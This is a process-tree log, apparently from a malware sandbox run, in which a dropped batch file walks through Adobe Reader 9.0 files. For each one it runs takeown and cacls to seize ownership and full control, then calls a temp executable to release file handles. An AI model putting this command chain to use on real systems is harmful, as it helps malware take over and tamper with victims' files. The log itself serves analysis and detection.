C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵
- Modifies file permissions
PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:1564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can03.ths" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can03.ths" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:1168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "pmd.cer" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "pmd.cer" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "pdf.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "pdf.gif" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_issue.gif" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_issue.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵
- Modifies file permissions
PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "zx______.pfm" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can32.clx" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can32.clx" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "symbol.txt" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "symbol.txt" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:1100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "brt04.hsp" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "engphon.env" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "engphon.env" -nobanner4⤵PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1516
-
-
-
